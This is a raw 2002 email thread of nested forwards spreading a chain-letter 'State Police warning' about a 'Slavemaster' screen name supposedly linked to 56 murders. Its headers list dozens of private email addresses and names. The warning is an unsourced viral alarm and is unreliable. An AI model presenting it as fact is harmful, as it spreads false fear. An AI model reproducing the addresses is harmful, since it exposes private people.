    LKatB22@aol.com, Jdr856@cs.com, mary119738@aol.com, KK1728R@aol.com,_x000D_
    Dry034@aol.com, GSHEENBEAN@aol.com, Glassylady08@hotmail.com,_x000D_
    Stephiejb6@aol.com, VLCurry@aol.com_x000D_
MIME-Version: 1.0_x000D_
Content-Type: multipart/mixed; boundary=3D"part4_f8.1691eef9.299706b5_bound=_x000D_
ary"_x000D_
X-Mailer: AOL 6.0 for Windows US sub 10556_x000D_
_x000D_
_x000D_
--part4_f8.1691eef9.299706b5_boundary_x000D_
Content-Type: text/plain; charset=3D"US-ASCII"_x000D_
Content-Transfer-Encoding: 7bit_x000D_
_x000D_
_x000D_
_x000D_
--part4_f8.1691eef9.299706b5_boundary_x000D_
Content-Type: message/rfc822_x000D_
Content-Disposition: inline_x000D_
_x000D_
Return-path: &lt;JRMEDIC52@aol.com&gt;_x000D_
From: JRMEDIC52@aol.com_x000D_
Full-name: JRMEDIC52_x000D_
Message-ID: &lt;13e.91ae6a5.299685b2@aol.com&gt;_x000D_
Date: Sat, 9 Feb 2002 09:01:22 EST_x000D_
Subject: Fwd: [Fwd: warning from state police]_x000D_
To: KACCURRY48@aol.com, VLCurry@aol.com, VEVANS@ADELPHIA.NET,_x000D_
    cheyenne95@citlink.net, MaHorn56@aol.com, Chickee582@aol.com,_x000D_
    ChimeLover1@aol.com, TanyaParrow@aol.com, KPSRFS@aol.com,_x000D_
    Brahms220@aol.com, attfire96@yahoo.com, Jmwformula@aol.com,_x000D_
    BANDIT1STONEY@aol.com, Thaine23@aol.com_x000D_
MIME-Version: 1.0_x000D_
Content-Type: multipart/mixed; boundary=3D"part5_f8.1691eef9.299685b2_bound=_x000D_
ary"_x000D_
X-Mailer: AOL 6.0 for Windows US sub 10556_x000D_
_x000D_
_x000D_
_x000D_
--part5_f8.1691eef9.299685b2_boundary_x000D_
Content-Type: multipart/alternative;_x000D_
    boundary=3D"part5_f8.1691eef9.299685b2_alt_boundary"_x000D_
_x000D_
_x000D_
--part5_f8.1691eef9.299685b2_alt_boundary_x000D_
Content-Type: text/plain; charset=3D"US-ASCII"_x000D_
Content-Transfer-Encoding: 7bit_x000D_
_x000D_
In a message dated 2/8/02 2:21:44 PM Eastern Standard Time, CEB250468 write=_x000D_
s:_x000D_
_x000D_
_x000D_
&gt;_x000D_
&gt;_x000D_
&gt;_x000D_
&gt; &gt;&gt; Original Message ----- Subject: State Police warning for Online_x000D_
&gt;&gt;_x000D_
&gt;&gt;_x000D_
&gt;&gt;_x000D_
&gt;&gt;_x000D_
&gt;&gt; &gt;&gt;&gt; State police warning for online:_x000D_
&gt;&gt;&gt;_x000D_
&gt;&gt;&gt; Please read this "very carefully"...then send it out to all the_x000D_
&gt;&gt;&gt; people_x000D_
&gt;&gt;&gt; online that you know.  Something like this is nothing to take_x000D_
&gt;&gt;&gt; casually;_x000D_
&gt;&gt;&gt; this is something you DO want to pay attention  to. Think of it as a_x000D_
&gt;&gt;&gt; bit_x000D_
&gt;&gt;&gt; of advice too. If a person with the screen-name of Slavemaster_x000D_
&gt;&gt;&gt; contacts_x000D_
&gt;&gt;&gt; you, do not reply. DO not talk to this person; do not answer any of_x000D_
&gt;&gt;&gt; his/her instant Messages or e-mail. Whoever this person may be,_x000D_
&gt;&gt;&gt; he/she_x000D_
&gt;&gt;&gt; is a suspect for murder in the death of 56 women (so far) contacted_x000D_
&gt;&gt;&gt; through the Internet. Please send this to all the women on your_x000D_
&gt;&gt;&gt; buddy_x000D_
&gt;&gt;&gt; list and ask them to pass this on, as well. This screen-name was_x000D_
&gt;&gt;&gt; seen on_x000D_
&gt;&gt;&gt; Yahoo, AOL, and Excite, so far. This is not a joke! Please send this_x000D_
&gt;&gt;&gt; to_x000D_
&gt;&gt;&gt; men too...just in case! Send to everyone you know! Ladies, this is_x000D_
&gt;&gt;&gt; serious._x000D_
&gt;&gt;&gt;_x000D_
&gt;&gt;&gt; Jennifer S. Faulkner_x000D_
&gt;&gt;&gt; Education/Information Specialist_x000D_
&gt;&gt;&gt; Roanoke Fire-EMS_x000D_
&gt;&gt;&gt; 541 Luck Avenue, Suite 120_x000D_
&gt;&gt;&gt; Roanoke, VA 24016_x000D_
&gt;&gt;&gt; (540) 853-2257 (phone)_x000D_
&gt;&gt;&gt; (540) 853-1172 (fax)_x000D_
&gt;&gt;&gt; &lt;A HREF=3D"http://us.f144.mail.yahoo.com/ym/Compose?To=3DJennifer_Faulk=_x000D_
ner@ci.roanoke.va.us"&gt;_x000D_
&gt;&gt;&gt;_x000D_
&gt;&gt;&gt;_x000D_
&gt;&gt;&gt;_x000D_
&gt;&gt;&gt; http://us.f144.mail.yahoo.com/ym/Compose?To=3DJennifer_Faulkner@ci.roan=_x000D_
oke.va.us_x000D_
&gt;&gt;&gt; &lt;/A&gt;_x000D_
&gt;&gt;&gt; &lt;A HREF=3D"http://us.f144.mail.yahoo.com/ym/Compose?To=3DJennifer_Faulk=_x000D_
ner@ci.roanoke.va.us"&gt;_x000D_
&gt;&gt;&gt;_x000D_
&gt;&gt;&gt;_x000D_
&gt;&gt;&gt;_x000D_
&gt;&gt;&gt; http://us.f144.mail.yahoo.com/ym/Compose?To=3DJennifer_Faulkner@ci.roan=_x000D_
oke.va.us_x000D_
&gt;&gt;&gt; &lt;/A&gt;_x000D_
&gt;&gt;_x000D_
&gt;&gt;_x000D_
&gt;&gt;_x000D_
&gt;_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
--part5_f8.1691eef9.299685b2_alt_boundary_x000D_
Content-Type: text/html; charset=3D"US-ASCII"_x000D_
Content-Transfer-Encoding: 7bit_x000D_
_x000D_
&lt;HTML&gt;&lt;FONT FACE=3Darial,helvetica&gt;&lt;FONT  SIZE=3D2&gt;In a message dated 2/8/0=_x000D_
2 2:21:44 PM Eastern Standard Time, CEB250468 writes:_x000D_
&lt;BR&gt;_x000D_
&lt;BR&gt;_x000D_
&lt;BR&gt;&lt;BLOCKQUOTE TYPE=3DCITE style=3D"BORDER-LEFT: #0000ff 2px solid; MARGIN=_x000D_
-LEFT: 5px; MARGIN-RIGHT: 0px; PADDING-LEFT: 5px"&gt;_x000D_
&lt;BR&gt;_x000D_
&lt;BR&gt;_x000D_
&lt;BR&gt;&lt;BLOCKQUOTE TYPE=3DCITE style=3D"BORDER-LEFT: #0000ff 2px solid; MARGIN=_x000D_
-LEFT: 5px; MARGIN-RIGHT: 0px; PADDING-LEFT: 5px"&gt;Original Message ----- &lt;B=_x000D_
&gt;Subject:&lt;/B&gt; State Police warning for Online_x000D_
&lt;BR&gt;_x000D_
&lt;BR&gt;_x000D_
&lt;BR&gt;_x000D_
&lt;BR&gt;&lt;P ALIGN=3DCENTER&gt;_x000D_
&lt;BR&gt;&lt;BLOCKQUOTE TYPE=3DCITE style=3D"BORDER-LEFT: #0000ff 2px solid; MARGIN=_x000D_
-LEFT: 5px; MARGIN-RIGHT: 0px; PADDING-LEFT: 5px"&gt;&lt;B&gt;State police warning f=_x000D_
or online:_x000D_
&lt;BR&gt;_x000D_
&lt;BR&gt;Please read this "very carefully"...then send it out to all the_x000D_
&lt;BR&gt;people_x000D_
&lt;BR&gt;online that you know.  Something like this is nothing to take_x000D_
&lt;BR&gt;casually;_x000D_
&lt;BR&gt;this is something you DO want to pay attention  to. Think of it as a_x000D_
&lt;BR&gt;bit_x000D_
&lt;BR&gt;of advice too. If a person with the screen-name of Slavemaster_x000D_
&lt;BR&gt;contacts_x000D_
&lt;BR&gt;you, do not reply. DO not talk to this person; do not answer any of_x000D_
&lt;BR&gt;his/her instant Messages or e-mail. Whoever this person may be,_x000D_
&lt;BR&gt;he/she_x000D_
&lt;BR&gt;is a suspect for murder in the death of 56 women (so far) contacted_x000D_
&lt;BR&gt;through the Internet. Please send this to all the women on your_x000D_
&lt;BR&gt;buddy_x000D_
&lt;BR&gt;list and ask them to pass this on, as well. This screen-name was_x000D_
&lt;BR&gt;seen on_x000D_
&lt;BR&gt;Yahoo, AOL, and Excite, so far. This is not a joke! Please send this_x000D_
&lt;BR&gt;to_x000D_
&lt;BR&gt;men too...just in case! Send to everyone you know! Ladies, this is_x000D_
&lt;BR&gt;serious._x000D_
&lt;BR&gt;_x000D_
&lt;BR&gt;Jennifer S. Faulkner_x000D_
&lt;BR&gt;Education/Information Specialist_x000D_
&lt;BR&gt;Roanoke Fire-EMS_x000D_
&lt;BR&gt;541 Luck Avenue, Suite 120_x000D_
&lt;BR&gt;Roanoke, VA 24016_x000D_
&lt;BR&gt;(540) 853-2257 (phone)_x000D_
&lt;BR&gt;(540) 853-1172 (fax)_x000D_
&lt;BR&gt;&lt;A HREF=3D"http://us.f144.mail.yahoo.com/ym/Compose?To=3DJennifer_Faulk=_x000D_
ner@ci.roanoke.va.us"&gt;http://us.f144.mail.yahoo.com/ym/Compose?To=3DJennife=_x000D_
r_Faulkner@ci.roanoke.va.us&lt;/A&gt;_x000D_
&lt;BR&gt;&lt;A HREF=3D"http://us.f144.mail.yahoo.com/ym/Compose?To=3DJennifer_Faulk=_x000D_
ner@ci.roanoke.va.us"&gt;http://us.f144.mail.yahoo.com/ym/Compose?To=3DJennife=_x000D_
r_Faulkner@ci.roanoke.va.us&lt;/A&gt;&lt;/B&gt;&lt;/B&gt; &lt;/BLOCKQUOTE&gt;_x000D_
&lt;BR&gt;_x000D_
&lt;BR&gt;&lt;P ALIGN=3DLEFT&gt;_x000D_
&lt;BR&gt;&lt;/BLOCKQUOTE&gt;_x000D_
&lt;BR&gt;&lt;/BLOCKQUOTE&gt;_x000D_
&lt;BR&gt;_x000D_
&lt;BR&gt;_x000D_
&lt;BR&gt;&lt;/P&gt;&lt;/P&gt;&lt;/FONT&gt;&lt;/HTML&gt;_x000D_
_x000D_
--part5_f8.1691eef9.299685b2_alt_boundary--_x000D_
_x000D_
_x000D_
--part5_f8.1691eef9.299685b2_boundary_x000D_
Content-Type: message/rfc822_x000D_
Content-Disposition: inline_x000D_
_x000D_
Return-path: &lt;CEB250468@aol.com&gt;_x000D_
From: CEB250468@aol.com_x000D_
Full-name: CEB250468_x000D_
Message-ID: &lt;160.8751f6a.29957f48@aol.com&gt;_x000D_
Date: Fri, 8 Feb 2002 14:21:44 EST_x000D_
Subject: Fwd: [Fwd: warning from state police]_x000D_
To: ALLANV957@aol.com, Arloe64@aol.com, annbro@dreamscape.com,_x000D_
    cde1215@yahoo.com, CBBCHAP@aol.com, SDEMT63@aol.com,_x000D_
    froglovermary@hotmail.com, Fir905@cs.com, Jess10589@aol.com,_x000D_
    JRMEDIC52@aol.com, XKottonMouthXX@aol.com, mayers@afsa.com,_x000D_
    mike@d-b-s.com, Proteus6464@cs.com, Tiggersspal@cs.com,_x000D_
    JudeeVee@aol.com_x000D_
MIME-Version: 1.0_x000D_
Content-Type: multipart/mixed; boundary=3D"part6_f8.1691eef9.29957f48_bound=_x000D_
ary"_x000D_
X-Mailer: AOL 7.0 for Windows US sub 256_x000D_
_x000D_
_x000D_
_x000D_
--part6_f8.1691eef9.29957f48_boundary_x000D_
Content-Type: multipart/alternative;_x000D_
    boundary=3D"part6_f8.1691eef9.29957f48_alt_boundary"_x000D_
_x000D_
_x000D_
--part6_f8.1691eef9.29957f48_alt_boundary_x000D_
Content-Type: text/plain; charset=3D"US-ASCII"_x000D_
Content-Transfer-Encoding: 7bit_x000D_
_x000D_
In a message dated 2/7/2002 9:43:20 AM Eastern Standard Time, Tobis1185_x000D_
writes:_x000D_
_x000D_
_x000D_
&gt; Original Message ----- Subject: State Police warning for Online_x000D_
&gt;_x000D_
&gt;_x000D_
&gt;_x000D_
&gt; &gt;&gt; State police warning for online:_x000D_
&gt;&gt;_x000D_
&gt;&gt; Please read this "very carefully"...then send it out to all the_x000D_
&gt;&gt; people_x000D_
&gt;&gt; online that you know.  Something like this is nothing to take_x000D_
&gt;&gt; casually;_x000D_
&gt;&gt; this is something you DO want to pay attention  to. Think of it as a_x000D_
&gt;&gt; bit_x000D_
&gt;&gt; of advice too. If a person with the screen-name of Slavemaster_x000D_
&gt;&gt; contacts_x000D_
&gt;&gt; you, do not reply. DO not talk to this person; do not answer any of_x000D_
&gt;&gt; his/her instant Messages or e-mail. Whoever this person may be,_x000D_
&gt;&gt; he/she_x000D_
&gt;&gt; is a suspect for murder in the death of 56 women (so far) contacted_x000D_
&gt;&gt; through the Internet. Please send this to all the women on your_x000D_
&gt;&gt; buddy_x000D_
&gt;&gt; list and ask them to pass this on, as well. This screen-name was_x000D_
&gt;&gt; seen on_x000D_
&gt;&gt; Yahoo, AOL, and Excite, so far. This is not a joke! Please send this_x000D_
&gt;&gt; to_x000D_
&gt;&gt; men too...just in case! Send to everyone you know! Ladies, this is_x000D_
&gt;&gt; serious._x000D_
&gt;&gt;_x000D_
&gt;&gt; Jennifer S. Faulkner_x000D_
&gt;&gt; Education/Information Specialist_x000D_
&gt;&gt; Roanoke Fire-EMS_x000D_
&gt;&gt; 541 Luck Avenue, Suite 120_x000D_
&gt;&gt; Roanoke, VA 24016_x000D_
&gt;&gt; (540) 853-2257 (phone)_x000D_
&gt;&gt; (540) 853-1172 (fax)_x000D_
&gt;&gt; &lt;A HREF=3D"http://us.f144.mail.yahoo.com/ym/Compose?To=3DJennifer_Faulkn=_x000D_
er@ci.roanoke.va.us"&gt;Jennifer_Faulkner@ci.roanoke.va.us&lt;/A&gt;_x000D_
&gt;&gt; &lt;A HREF=3D"http://us.f144.mail.yahoo.com/ym/Compose?To=3DJennifer_Faulkn=_x000D_
er@ci.roanoke.va.us"&gt;mailto:Jennifer_Faulkner@ci.roanoke.va.us&lt;/A&gt;_x000D_
&gt;_x000D_
&gt;_x000D_
&gt;_x000D_
&gt;_x000D_
&gt;_x000D_
_x000D_
_x000D_
--part6_f8.1691eef9.29957f48_alt_boundary_x000D_
Content-Type: text/html; charset=3D"US-ASCII"_x000D_
Content-Transfer-Encoding: 7bit_x000D_
_x000D_
&lt;HTML&gt;&lt;FONT FACE=3Darial,helvetica&gt;&lt;FONT  SIZE=3D2 FAMILY=3D"SANSSERIF" FAC=_x000D_
E=3D"Arial" LANG=3D"0"&gt;In a message dated 2/7/2002 9:43:20 AM Eastern Stand=_x000D_
ard Time, Tobis1185 writes:&lt;BR&gt;_x000D_
&lt;BR&gt;_x000D_
&lt;BR&gt;_x000D_
&lt;BLOCKQUOTE TYPE=3DCITE style=3D"BORDER-LEFT: #0000ff 2px solid; MARGIN-LEF=_x000D_
T: 5px; MARGIN-RIGHT: 0px; PADDING-LEFT: 5px"&gt;Original Message ----- &lt;B&gt;Sub=_x000D_
ject:&lt;/B&gt; State Police warning for Online&lt;BR&gt;_x000D_
&lt;BR&gt;_x000D_
&lt;BR&gt;_x000D_
&lt;BR&gt;_x000D_
&lt;P ALIGN=3DCENTER&gt;&lt;BLOCKQUOTE TYPE=3DCITE style=3D"BORDER-LEFT: #0000ff 2px=_x000D_
 solid; MARGIN-LEFT: 5px; MARGIN-RIGHT: 0px; PADDING-LEFT: 5px"&gt;&lt;B&gt;State po=_x000D_
lice warning for online: &lt;BR&gt;_x000D_
&lt;BR&gt;_x000D_
Please read this "very carefully"...then send it out to all the &lt;BR&gt;_x000D_
people &lt;BR&gt;_x000D_
online that you know.  Something like this is nothing to take &lt;BR&gt;_x000D_
casually; &lt;BR&gt;_x000D_
this is something you DO want to pay attention  to. Think of it as a &lt;BR&gt;_x000D_
bit &lt;BR&gt;_x000D_
of advice too. If a person with the screen-name of Slavemaster &lt;BR&gt;_x000D_
contacts &lt;BR&gt;_x000D_
you, do not reply. DO not talk to this person; do not answer any of &lt;BR&gt;_x000D_
his/her instant Messages or e-mail. Whoever this person may be, &lt;BR&gt;_x000D_
he/she &lt;BR&gt;_x000D_
is a suspect for murder in the death of 56 women (so far) contacted &lt;BR&gt;_x000D_
through the Internet. Please send this to all the women on your &lt;BR&gt;_x000D_
buddy &lt;BR&gt;_x000D_
list and ask them to pass this on, as well. This screen-name was &lt;BR&gt;_x000D_
seen on &lt;BR&gt;_x000D_
Yahoo, AOL, and Excite, so far. This is not a joke! Please send this &lt;BR&gt;_x000D_
to &lt;BR&gt;_x000D_
men too...just in case! Send to everyone you know! Ladies, this is &lt;BR&gt;_x000D_
serious. &lt;BR&gt;_x000D_
&lt;BR&gt;_x000D_
Jennifer S. Faulkner &lt;BR&gt;_x000D_
Education/Information Specialist &lt;BR&gt;_x000D_
Roanoke Fire-EMS &lt;BR&gt;_x000D_
541 Luck Avenue, Suite 120 &lt;BR&gt;_x000D_
Roanoke, VA 24016 &lt;BR&gt;_x000D_
(540) 853-2257 (phone) &lt;BR&gt;_x000D_
(540) 853-1172 (fax) &lt;BR&gt;_x000D_
&lt;A HREF=3D"http://us.f144.mail.yahoo.com/ym/Compose?To=3DJennifer_Faulkner@=_x000D_
ci.roanoke.va.us"&gt;Jennifer_Faulkner@ci.roanoke.va.us&lt;/A&gt; &lt;BR&gt;_x000D_
&lt;A HREF=3D"http://us.f144.mail.yahoo.com/ym/Compose?To=3DJennifer_Faulkner@=_x000D_
ci.roanoke.va.us"&gt;mailto:Jennifer_Faulkner@ci.roanoke.va.us&lt;/A&gt;&lt;/B&gt;&lt;/B&gt; &lt;/B=_x000D_
LOCKQUOTE&gt;&lt;BR&gt;_x000D_
&lt;BR&gt;_x000D_
&lt;P ALIGN=3DLEFT&gt;&lt;/FONT&gt;&lt;FONT  COLOR=3D"#000000" style=3D"BACKGROUND-COLOR: =_x000D_
#ffffff" SIZE=3D3 FAMILY=3D"SANSSERIF" FACE=3D"Arial" LANG=3D"0"&gt;&lt;BR&gt;_x000D_
&lt;BR&gt;_x000D_
&lt;BR&gt;_x000D_
&lt;/BLOCKQUOTE&gt;&lt;BR&gt;_x000D_
&lt;BR&gt;_x000D_
&lt;/P&gt;&lt;/P&gt;&lt;/FONT&gt;&lt;/HTML&gt;_x000D_
--part6_f8.1691eef9.29957f48_alt_boundary--_x000D_
_x000D_
_x000D_
--part6_f8.1691eef9.29957f48_boundary_x000D_
Content-Type: message/rfc822_x000D_
Content-Disposition: inline_x000D_
_x000D_
Return-path: &lt;Tobis1185@aol.com&gt;_x000D_
From: Tobis1185@aol.com_x000D_
Full-name: Tobis1185_x000D_
Message-ID: &lt;16e.86db494.2993ec88@aol.com&gt;_x000D_
Date: Thu, 7 Feb 2002 09:43:20 EST_x000D_
Subject: Fwd: [Fwd: warning from state police]_x000D_
To: Amylou92@aol.com, Specialgirl72@aol.com, Kickr74@aol.com,_x000D_
    Gburrs1231@aol.com, SDSUkitten27@aol.com, kelly466@hotmail.com,_x000D_
    eiliswagner@hotmail.com, HMB826@aol.com, rharris3@twcny.rr.com,_x000D_
    Hosecuffs@aol.com, jstephe1@twcny.rr.com, mgaworecki@yahoo.com,_x000D_
    commexe@juno.com, Garylizsny@aol.com, leslyeh@yahoo.com,_x000D_
    jklugnut@juno.com, jaymart77@yahoo.com, wares018@yahoo.com,_x000D_
    scrimmins@usadatanet.net, RCP1093@aol.com, IFD303@aol.com,_x000D_
    shafe53@yahoo.com, tricia@ntcnet.com, DsPadd@aol.com,_x000D_
    LarzyandKim@aol.com, SEEpps@aol.com, J3Ginger@aol.com,_x000D_
    BAKrasuski@aol.com, HOTSUGAR4U@aol.com, CEB250468@aol.com,_x000D_
    Vegasitalnprncs@aol.com, laur8619@hotmail.com, Rivi26@aol.com,_x000D_
    rnbaybee@hotmail.com, CSamarco@aol.com, shelday@hotmail.com_x000D_
MIME-Version: 1.0_x000D_
Content-Type: multipart/mixed; boundary=3D"part7_f8.1691eef9.2993ec88_bound=_x000D_
ary"_x000D_
X-Mailer: AOL 7.0 for Windows US sub 118_x000D_
_x000D_
_x000D_
--part7_f8.1691eef9.2993ec88_boundary_x000D_
Content-Type: text/plain; charset=3D"US-ASCII"_x000D_
Content-Transfer-Encoding: 7bit_x000D_
_x000D_
_x000D_
_x000D_
--part7_f8.1691eef9.2993ec88_boundary_x000D_
Content-Type: message/rfc822_x000D_
Content-Disposition: inline_x000D_
_x000D_
Return-Path: &lt;scrimmins@usadatanet.net&gt;_x000D_
Received: from  rly-xf01.mx.aol.com (rly-xf01.mail.aol.com [172.20.105.225]=_x000D_
) by air-xf03.mail.aol.com (v83.35) with ESMTP id MAILINXF39-0207093953; Th=_x000D_
u, 07 Feb 2002 09:39:53 -0500_x000D_
Received: from  mail.usadatanet.net (mail.usadatanet.net [208.48.41.252]) b=_x000D_
y rly-xf01.mx.aol.com (v83.35) with ESMTP id MAILRELAYINXF16-0207093932; Th=_x000D_
u, 07 Feb 2002 09:39:32 1900_x000D_
Received: from usadatanet.net (unverified [66.218.13.220]) by mail.usadatan=_x000D_
et.net_x000D_
 (Vircom SMTPRS 5.0.194) with ESMTP id &lt;B0030192445@mail.usadatanet.net&gt;;_x000D_
 Thu, 7 Feb 2002 09:34:20 -0500_x000D_
Message-ID: &lt;3C629235.56ED1A02@usadatanet.net&gt;_x000D_
Date: Thu, 07 Feb 2002 09:41:57 -0500_x000D_
From: Susan Crimmins &lt;scrimmins@usadatanet.net&gt;_x000D_
X-Mailer: Mozilla 4.7 [en] (Win98; I)_x000D_
X-Accept-Language: en_x000D_
MIME-Version: 1.0_x000D_
To: elaine brown &lt;elaine@twcny.rr.com&gt;, Erica Wheet &lt;tejwheet@usadatanet.ne=_x000D_
t&gt;,_x000D_
        Gail Powell &lt;GEPangel@aol.com&gt;,_x000D_
        Joyce Kaufman &lt;jkaufman@usadatanet.net&gt;,_x000D_
        Kathy Haberek &lt;kathybh@usadatanet.net&gt;,_x000D_
        Kelly Wares &lt;wares018@yahoo.com&gt;, Kim Rohacek &lt;kimmy1490@hotmail.co=_x000D_
m&gt;,_x000D_
        Laura Crimmins &lt;laurasue13@hotmail.com&gt;,_x000D_
        Martie Harkins &lt;jaymart77@yahoo.com&gt;,_x000D_
        Sarah Crimmins &lt;Sarah.Crimmins@westgroup.com&gt;,_x000D_
        Tom Pedersen &lt;tobis1185@aol.com&gt;_x000D_
Subject: [Fwd: warning from state police]_x000D_
Content-Type: multipart/mixed;_x000D_
 boundary=3D"------------749C03814B0D648BA1CE2BC0"_x000D_
_x000D_
_x000D_
--------------749C03814B0D648BA1CE2BC0_x000D_
Content-Type: text/plain; charset=3Dus-ascii_x000D_
Content-Transfer-Encoding: 7bit_x000D_
_x000D_
_x000D_
_x000D_
--------------749C03814B0D648BA1CE2BC0_x000D_
Content-Type: message/rfc822_x000D_
Content-Transfer-Encoding: 7bit_x000D_
Content-Disposition: inline_x000D_
_x000D_
Return-path: &lt;queen_of_66@yahoo.com&gt;_x000D_
Received: from web14404.mail.yahoo.com (unverified [216.136.174.61]) by mai=_x000D_
l.usadatanet.net_x000D_
 (Vircom SMTPRS 5.0.194) with SMTP id &lt;B0030139304@mail.usadatanet.net&gt; for=_x000D_
 &lt;scrimmins@usadatanet.net&gt;;_x000D_
 Wed, 6 Feb 2002 19:50:18 -0500_x000D_
Message-ID: &lt;20020207005522.95108.qmail@web14404.mail.yahoo.com&gt;_x000D_
Received: from [65.174.174.123] by web14404.mail.yahoo.com via HTTP; Wed, 0=_x000D_
6 Feb 2002 16:55:22 PST_x000D_
Date: Wed, 6 Feb 2002 16:55:22 -0800 (PST)_x000D_
From: debra dixon &lt;queen_of_66@yahoo.com&gt;_x000D_
Subject: warning from state police_x000D_
To: Tracy &lt;twameling@aol.com&gt;, Alan &lt;Indiansaws@hotmail.com&gt;,_x000D_
  Becky &lt;BSadlon@aol.com&gt;, Bernie &lt;BernardCrim@yahoo.com&gt;,_x000D_
  Billy &lt;hornsb@telenet.net&gt;, Cindy &lt;sisnan@ntcnet.com&gt;,_x000D_
  Corine &lt;CoriCrim@yahoo.com&gt;, sue crimmins &lt;scrimmins@mvip.net&gt;,_x000D_
  sue chuck crimmins &lt;scrimmins@usadatanet.net&gt;,_x000D_
  mary farrell &lt;bony31544@aol.com&gt;, marie fullem &lt;mfullem@ntcnet.com&gt;,_x000D_
  Heather &lt;hrobins37@hotmail.com&gt;,_x000D_
  Sharon Herringshaw &lt;sherringshaw@usadatanet.net&gt;,_x000D_
  Jennifer &lt;Jjmunger@aol.com&gt;, Jimmy &lt;vader12@excite.com&gt;,_x000D_
  Lindsey &lt;dolph24ins@hotmail.com&gt;, patti lucey &lt;bluce9@aol.com&gt;,_x000D_
  SUE MCLAIN &lt;mswizard84@hotmail.com&gt;, Brian Sadlon &lt;Sadman89@ntcnet.com&gt;,_x000D_
  Sadlon's &lt;Sadlon5@ntcnet.com&gt;, larry schofield &lt;schofie@charter.net&gt;,_x000D_
  valerie smith &lt;valid@gte.net&gt;, Sonya &lt;sony_elmo@hotmail.com&gt;,_x000D_
  sharon staring &lt;sstaring@usadatanet.net&gt;_x000D_
MIME-Version: 1.0_x000D_
Content-Type: multipart/alternative; boundary=3D"0-1110816747-1013043322=3D=_x000D_
:93116"_x000D_
X-Mozilla-Status2: 00000000_x000D_
_x000D_
_x000D_
_x000D_
--0-1110816747-1013043322=3D:93116_x000D_
Content-Type: text/plain; charset=3Dus-ascii_x000D_
_x000D_
Original Message ----- Subject: State Police warning for Online_x000D_
_x000D_
_x000D_
State police warning for online:_x000D_
_x000D_
Please read this "very carefully"...then send it out to all the_x000D_
people_x000D_
online that you know.  Something like this is nothing to take_x000D_
casually;_x000D_
this is something you DO want to pay attention  to. Think of it as a_x000D_
bit_x000D_
of advice too. If a person with the screen-name of Slavemaster_x000D_
contacts_x000D_
you, do not reply. DO not talk to this person; do not answer any of_x000D_
his/her instant Messages or e-mail. Whoever this person may be,_x000D_
he/she_x000D_
is a suspect for murder in the death of 56 women (so far) contacted_x000D_
through the Internet. Please send this to all the women on your_x000D_
buddy_x000D_
list and ask them to pass this on, as well. This screen-name was_x000D_
seen on_x000D_
Yahoo, AOL, and Excite, so far. This is not a joke! Please send this_x000D_
to_x000D_
men too...just in case! Send to everyone you know! Ladies, this is_x000D_
serious._x000D_
_x000D_
Jennifer S. Faulkner_x000D_
Education/Information Specialist_x000D_
Roanoke Fire-EMS_x000D_
541 Luck Avenue, Suite 120_x000D_
Roanoke, VA 24016_x000D_
(540) 853-2257 (phone)_x000D_
(540) 853-1172 (fax)_x000D_
Jennifer_Faulkner@ci.roanoke.va.us_x000D_
mailto:Jennifer_Faulkner@ci.roanoke.va.us_x000D_
_x000D_
_x000D_
---------------------------------_x000D_
Do You Yahoo!?_x000D_
Send FREE Valentine eCards with Yahoo! Greetings!_x000D_
_x000D_
--0-1110816747-1013043322=3D:93116_x000D_
Content-Type: text/html; charset=3Dus-ascii_x000D_
_x000D_
Original Message -----_x000D_
&lt;DIV&gt;&lt;B&gt;Subject:&lt;/B&gt; State Police warning for Online&lt;/DIV&gt;_x000D_
&lt;DIV&gt;&lt;BR&gt;&lt;/DIV&gt;_x000D_
&lt;DIV&gt;&lt;FONT face=3DArial size=3D2&gt;&lt;BR&gt;_x000D_
&lt;P align=3Dcenter&gt;_x000D_
&lt;BLOCKQUOTE TYPE=3D"CITE"&gt;&lt;B&gt;State police warning for online: &lt;BR&gt;&lt;BR&gt;Pleas=_x000D_
e read this "very carefully"...then send it out to all the &lt;BR&gt;people &lt;BR&gt;o=_x000D_
nline that you know.  Something like this is nothing to take &lt;BR&gt;casually; =_x000D_
&lt;BR&gt;this is something you DO want to pay attention  to. Think of it as a &lt;B=_x000D_
R&gt;bit &lt;BR&gt;of advice too. If a person with the screen-name of Slavemaster &lt;B=_x000D_
R&gt;contacts &lt;BR&gt;you, do not reply. DO not talk to this person; do not answer=_x000D_
 any of &lt;BR&gt;his/her instant Messages or e-mail. Whoever this person may be,=_x000D_
 &lt;BR&gt;he/she &lt;BR&gt;is a suspect for murder in the death of 56 women (so far) c=_x000D_
ontacted &lt;BR&gt;through the Internet. Please send this to all the women on you=_x000D_
r &lt;BR&gt;buddy &lt;BR&gt;list and ask them to pass this on, as well. This screen-nam=_x000D_
e was &lt;BR&gt;seen on &lt;BR&gt;Yahoo, AOL, and Excite, so far. This is not a joke! P=_x000D_
lease send this &lt;BR&gt;to &lt;BR&gt;men too...just in case! Send to everyone you kno=_x000D_
w! Ladies, this is &lt;BR&gt;serious. &lt;BR&gt;&lt;BR&gt;Jennifer S. Faulkner &lt;BR&gt;Education/=_x000D_
Information Specialist &lt;BR&gt;Roanoke Fire-EMS &lt;BR&gt;541 Luck Avenue, Suite 120 =_x000D_
&lt;BR&gt;Roanoke, VA 24016 &lt;BR&gt;(540) 853-2257 (phone) &lt;BR&gt;(540) 853-1172 (fax) &lt;=_x000D_
BR&gt;&lt;A target=3D_blank href=3D"http://us.f144.mail.yahoo.com/ym/Compose?To=_x000D_
=3DJennifer_Faulkner@ci.roanoke.va.us"&gt;Jennifer_Faulkner@ci.roanoke.va.us&lt;/=_x000D_
A&gt; &lt;BR&gt;&lt;A target=3D_blank href=3D"http://us.f144.mail.yahoo.com/ym/Compose?=_x000D_
To=3DJennifer_Faulkner@ci.roanoke.va.us"&gt;mailto:Jennifer_Faulkner@ci.roanok=_x000D_
e.va.us&lt;/A&gt;&lt;/B&gt;&lt;/B&gt; &lt;/BLOCKQUOTE&gt;&lt;/FONT&gt;&lt;/DIV&gt;&lt;p&gt;&lt;br&gt;&lt;hr size=3D1&gt;&lt;b&gt;Do You=_x000D_
 Yahoo!?&lt;/b&gt;&lt;br&gt;_x000D_
Send FREE Valentine eCards with &lt;a href=3D"http://rd.yahoo.com/mail_us/tag/=_x000D_
?http://greetings.yahoo.com"&gt;Yahoo! Greetings!&lt;/a&gt;_x000D_
_x000D_
--0-1110816747-1013043322=3D:93116--_x000D_
_x000D_
_x000D_
--------------749C03814B0D648BA1CE2BC0--_x000D_
_x000D_
_x000D_
--part7_f8.1691eef9.2993ec88_boundary--_x000D_
_x000D_
_x000D_
